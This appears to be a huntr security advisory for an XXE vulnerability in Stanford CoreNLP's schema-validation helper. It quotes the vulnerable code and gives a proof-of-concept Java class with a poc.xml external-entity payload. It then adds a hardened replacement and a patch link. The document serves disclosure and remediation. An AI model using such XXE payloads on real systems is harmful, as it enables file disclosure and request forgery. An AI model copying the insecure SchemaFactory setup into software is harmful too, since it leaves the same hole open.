huntr | Haxatron | A717AEC2-5646-4A5F-ADE0-DADC25736AE3
History: Jan 15, 2022 - 3:28 a.m.

in stanfordnlp/corenlp

2022-01-15 03:28:43 | haxatron | www.huntr.dev | 10

EPSS: 0.002 (Low), Percentile: 57.2%

Description

When a malicious schema XML file is passed to getValidatingXmlParser(), the SchemaFactory that parses that schema file is vulnerable to XXE.

In https://github.com/stanfordnlp/CoreNLP/blob/4c28eb5f5e44381b4157aa4fcab72e9231ce42b8/src/edu/stanford/nlp/util/XMLUtils.java#L304L305

public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
...
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(schemaFile);

The SchemaFactory is created without FEATURE_SECURE_PROCESSING set (and without restricting external DTD/schema access), so it resolves external entities when it builds a new Schema from schemaFile.

Proof of Concept

By default, SchemaFactory is vulnerable to XXE as shown by the example below:

import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;

import java.io.File;

public class Poc {

    public static void main(String[] args) {
        try {
            // Default factory: no FEATURE_SECURE_PROCESSING, no external-access limits.
            SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            // Parsing poc.xml resolves the external entity it declares.
            Schema schema = factory.newSchema(new File("poc.xml"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

poc.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
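The hardening the report calls for, as an added example (not CoreNLP's code and not the linked patch): a SchemaFactory with FEATURE_SECURE_PROCESSING enabled and external DTD/schema access disabled, plus a small harness that writes the poc.xml document above to a temporary file and confirms the hardened factory rejects it instead of fetching the entity. The class name HardenedSchemaLoader and the temp-file setup are assumptions for the demo.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;
import java.io.File;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

public class HardenedSchemaLoader {
    // Builds a validating DocumentBuilder from a schema file while refusing
    // external entities and external DTD/schema fetches (hypothetical replacement).
    public static DocumentBuilder getValidatingXmlParser(File schemaFile) throws Exception {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        // Secure processing enables the JDK parser's entity/expansion limits.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Empty string = no protocol may be used for external DTDs / schema includes.
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        Schema schema = factory.newSchema(schemaFile);

        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setSchema(schema);
        // Same hardening for the document parser that validates against the schema.
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return dbf.newDocumentBuilder();
    }

    public static void main(String[] args) throws Exception {
        // Constructed input: the same external-entity DOCTYPE as poc.xml above.
        Path schema = Files.createTempFile("poc", ".xml");
        Files.write(schema, ("<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]>\n"
                + "<foo>&xxe;</foo>\n").getBytes(StandardCharsets.UTF_8));
        try {
            getValidatingXmlParser(schema.toFile());
            System.out.println("schema accepted (unexpected)");
        } catch (SAXException e) {
            // Expected: the external entity is refused under the access restriction.
            System.out.println("rejected: " + e.getMessage());
        } finally {
            Files.deleteIfExists(schema);
        }
    }
}
```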

Patch

https://github.com/stanfordnlp/corenlp/compare/HEAD…haxatron:fix-xxe-2

Impact

This vulnerability enables XXE whenever a developer uses this function to validate XML files against malicious schema files.
